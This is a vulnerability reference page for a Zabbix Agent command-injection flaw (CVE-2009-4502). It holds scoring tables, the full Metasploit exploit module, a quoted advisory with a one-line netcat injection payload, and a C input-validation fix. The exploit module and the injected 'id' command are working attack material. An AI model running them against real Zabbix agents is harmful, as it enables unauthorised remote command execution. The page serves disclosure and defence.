CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
The NET_TCP_LISTEN function in net.c in Zabbix Agent before 1.6.7, when running on FreeBSD or Solaris, allows remote attackers to bypass the EnableRemoteCommands setting and execute arbitrary commands via shell metacharacters in the argument to net.tcp.listen. NOTE: this attack is limited to attacks from trusted IP addresses.
Category : Permissions, Privileges, and Access Controls
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.
Metrics

| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 9.3 | | AV:N/AC:M/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
| Date | EPSS V0 | EPSS V1 | EPSS V2 (> 2022-02-04) | EPSS V3 (> 2025-03-07) | EPSS V4 (> 2025-03-17) |
|---|---|---|---|---|---|
| 2022-02-06 | – | – | 71.79% | – | – |
| 2023-03-12 | – | – | – | 61.08% | – |
| 2023-04-16 | – | – | – | 58.91% | – |
| 2023-06-04 | – | – | – | 64.28% | – |
| 2023-07-16 | – | – | – | 61.44% | – |
| 2023-12-10 | – | – | – | 61.44% | – |
| 2024-01-07 | – | – | – | 57.2% | – |
| 2024-02-11 | – | – | – | 90.72% | – |
| 2024-03-17 | – | – | – | 91.33% | – |
| 2024-04-14 | – | – | – | 91.27% | – |
| 2024-06-02 | – | – | – | 92.76% | – |
| 2024-09-22 | – | – | – | 65.21% | – |
| 2024-12-22 | – | – | – | 69.56% | – |
| 2025-01-19 | – | – | – | 69.56% | – |
| 2025-02-23 | – | – | – | 65.19% | – |
| 2025-03-18 | – | – | – | – | 63.55% |
EPSS Percentile
The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile is thus a way to compare the EPSS score of one CVE with that of other CVEs.
```ruby
##
# $Id: zabbix_agent_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Zabbix Agent net.tcp.listen Command Injection',
			'Description'    => %q{
					This module exploits a metacharacter injection vulnerability
				in the FreeBSD and Solaris versions of the Zabbix agent. This flaw
				can only be exploited if the attacker can hijack the IP address
				of an authorized server (as defined in the configuration file).
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'CVE', '2009-4502' ],
					[ 'OSVDB', '60956' ],
					[ 'URL', 'https://support.zabbix.com/browse/ZBX-1032'],
				],
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,
			'Privileged'     => false,
			'Payload'        =>
				{
					'BadChars'    => "'",
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        =>
				[
					[ 'Automatic Target', { }]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Sep 10 2009'))

		register_options(
			[
				Opt::RPORT(10050)
			], self.class)
	end

	def exploit
		connect

		rnd_port = rand(1024) + 1
		buf = "net.tcp.listen[#{rnd_port}';#{payload.encoded};']\n"

		print_status("Sending net.tcp.listen() request to the zabbix agent...")
		sock.put(buf)

		res = nil
		begin
			res = sock.get_once(-1, 5)
		rescue ::EOFError
		end

		if ! res
			print_status("The zabbix agent did not reply, our IP must not be in the allowed server list.")
			disconnect
			return
		end

		if (res =~ /ZBX_NOTSUPPORTED/)
			print_status("The zabbix agent is not running a vulnerable version or operating system.")
			disconnect
			return
		end

		if(res !~ /ZBXD/)
			print_status("The zabbix agent returned an unknown response.")
			disconnect
			return
		end

		print_status("The zabbix agent should have executed our command.")
		disconnect
	end

end
```
Zabbix Agent : Bypass of EnableRemoteCommands=0
From: Nicob <nicob () nicob net>
Date: Sun, 13 Dec 2009 16:28:30 +0100
From Wikipedia : "Zabbix is a network management system application
[...] designed to monitor and track the status of various network
services, servers, and other network hardware."
[Zabbix Agent : Bypass of EnableRemoteCommands=0]
Impacted software : Zabbix Agent (FreeBSD and Solaris only)
Zabbix reference : https://support.zabbix.com/browse/ZBX-1032
Patched version : 1.6.7
Faulty source code : function NET_TCP_LISTEN() in
libs/zbxsysinfo/(freebsd|solaris)/net.c
Exploit : $> echo "net.tcp.listen[80';id;echo ']"|nc -vn xxxxx 10050
Limitation : attacker must come from (or spoof) a trusted IP address
Changelog entry : fixed security vulnerability in processing of
net.tcp.listen under FreeBSD and Solaris agents
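
The flaw described above comes down to the `net.tcp.listen` parameter being treated as text rather than as a port number. The following is an added example, not Zabbix source code or the project's patch: a strict check that accepts the parameter only when it is a decimal TCP port. The function name `listen_port_from_key` and the sample keys are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not Zabbix source): take an agent item key of the
 * form net.tcp.listen[<port>] and return the port only if the parameter
 * is a plain decimal TCP port; return -1 for anything else. */
int listen_port_from_key(const char *key)
{
    static const char prefix[] = "net.tcp.listen[";
    const char *p;
    long port = 0;
    int digits = 0;

    if (key == NULL || strncmp(key, prefix, sizeof(prefix) - 1) != 0)
        return -1;

    for (p = key + sizeof(prefix) - 1; *p >= '0' && *p <= '9'; p++) {
        if (++digits > 5)               /* longest valid port is "65535" */
            return -1;
        port = port * 10 + (*p - '0');
    }

    /* Digits must run straight into ']' and the key must end there (one
     * trailing newline allowed), so quotes, ';', '|' and spaces all fail. */
    if (digits == 0 || *p++ != ']')
        return -1;
    if (*p == '\n')
        p++;
    if (*p != '\0')
        return -1;

    return (port >= 1 && port <= 65535) ? (int)port : -1;
}

int main(void)
{
    /* Constructed inputs; the second is the request shape from the advisory. */
    const char *keys[] = { "net.tcp.listen[80]\n",
                           "net.tcp.listen[80';id;echo ']\n",
                           "net.tcp.listen[65536]", "net.tcp.listen[]" };
    size_t i;

    for (i = 0; i < sizeof(keys) / sizeof(keys[0]); i++)
        printf("%d\n", listen_port_from_key(keys[i]));
    return 0;
}
```

Only the returned integer, never the original string, should be used in whatever lookup follows.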